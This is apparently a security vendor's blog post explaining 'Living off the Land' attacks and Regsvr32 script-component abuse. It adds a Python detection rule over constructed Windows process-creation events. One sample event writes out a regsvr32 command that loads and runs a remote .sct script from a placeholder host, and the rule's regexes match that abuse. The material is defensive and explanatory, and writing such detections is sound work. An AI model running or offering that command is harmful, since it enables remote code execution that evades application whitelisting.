Attack, Deconstructed: Living off the Land

What is a “Living off the Land” (LOLBAS) attack?

Here’s how it works!

  1. A company user visits a compromised website, inserts an infected USB drive, or opens a phishing email.
  2. The attacker scans the machine for weak spots and targets.
  3. The attacker hides malware inside already-existing, white-listed software.
  4. The attacker searches the environment and carries out malicious activity under the radar.
  5. The attacker continues to take data and run malicious activity through the planted malware, since the software used as cover is white-listed.

We see time and time again that companies are not upgrading their Endpoint Detection & Response (EDR) capabilities. This is a huge vulnerability in IT/network security, because LOLBAS attacks abuse the local operating system (OS) to avoid detection: they use tools or features that already exist in the target environment, which makes them more difficult for defenders to detect or prevent.

Some EDR products lack the capability to stop, or even detect, LOLBAS-based attacks!

To combat this type of attack, we mapped and developed an out-of-the-box integration rule bundle that leverages built-in Windows auditing capabilities to detect such attacks, minimizing an expensive risk with a quick (and easy) solution. The LOLBAS bundle includes around 200 unique detection rules.

One of the LOLBAS rules in the bundle covers Regsvr32:

Regsvr32 is a command-line utility that registers and unregisters OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.

An adversary can use this signed Windows binary to achieve signed-binary proxy execution, defined by MITRE ATT&CK as technique T1117.

It may be possible to bypass application whitelisting solutions, because the execution of signed system binaries is usually allowed.

The technique works by calling the command-line tool to run a local or remote Windows Script Component (SCT) file, in which VBScript or JavaScript can be used to gain arbitrary code execution. Because regsvr32.exe is network- and proxy-aware, the script can be loaded by passing a uniform resource locator (URL) to a file on an external web server as an argument during invocation.
This method makes no changes to the Registry, as the COM object is not actually registered, only executed.
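The detection side of this, as an added example that is not part of the original post or of the QMasters bundle: a rule in the spirit of the Windows-auditing approach described above, run over constructed Windows Security 4688 (process creation) records. The field names follow the 4688 event schema; the users, paths and command lines are made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample Windows Security "4688: A new process has been created"
# records, reduced to the fields the rule needs. These are not real logs.
# Note: 4688 carries CommandLine only when the audit policy "Include command
# line in process creation events" is enabled, which this rule relies on.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4688", "SubjectUserName": "alice", "NewProcessName": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'},
    {"EventID": "4688", "SubjectUserName": "bob", "NewProcessName": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:https://cdn.example.invalid/update.sct"},
    {"EventID": "4688", "SubjectUserName": "carol", "NewProcessName": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /i:C:\Users\carol\AppData\Local\Temp\inv.sct"},
    {"EventID": "4688", "SubjectUserName": "dave", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo https://intranet.example.invalid"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)   # remote script source
SCT_RE = re.compile(r"\.sct\b", re.IGNORECASE)                # Windows Script Component file
INSTALL_RE = re.compile(r"(?<!\S)/i:", re.IGNORECASE)         # /i: carries the script location


def regsvr32_indicators(event: Dict[str, str]) -> List[str]:
    """Return why a 4688 event looks like Regsvr32 script abuse; a plain local
    .dll/.ocx registration is routine and yields no reasons."""
    if event.get("EventID") != "4688":
        return []
    image = event.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
    if image != "regsvr32.exe":
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL passed to regsvr32 (network-aware script load)")
    if SCT_RE.search(cmd):
        reasons.append("Windows Script Component (.sct) file argument")
    if reasons and INSTALL_RE.search(cmd):
        reasons.append("/i: install switch carries the script location")
    return reasons


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the rule to a batch of events and return one alert per hit."""
    alerts = []
    for ev in events:
        reasons = regsvr32_indicators(ev)
        if reasons:
            alerts.append({"user": ev.get("SubjectUserName", "?"), "reasons": reasons})
    return alerts
```

Because no Registry change is made, process-creation auditing (or an equivalent Sysmon process event) is the record that survives; a rule keyed on the Registry alone would miss this.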

To learn more about this attack, visit MITRE.

About QMasters

QMasters was founded in 2015 to help Israeli governmental, military, niche security, and municipality offices protect themselves from cyber-attacks. As the cyber security threats grow year after year, so does our list of customers. We are a team of 30+ security experts committed to solving security challenges with the right combination of strategies and technologies.
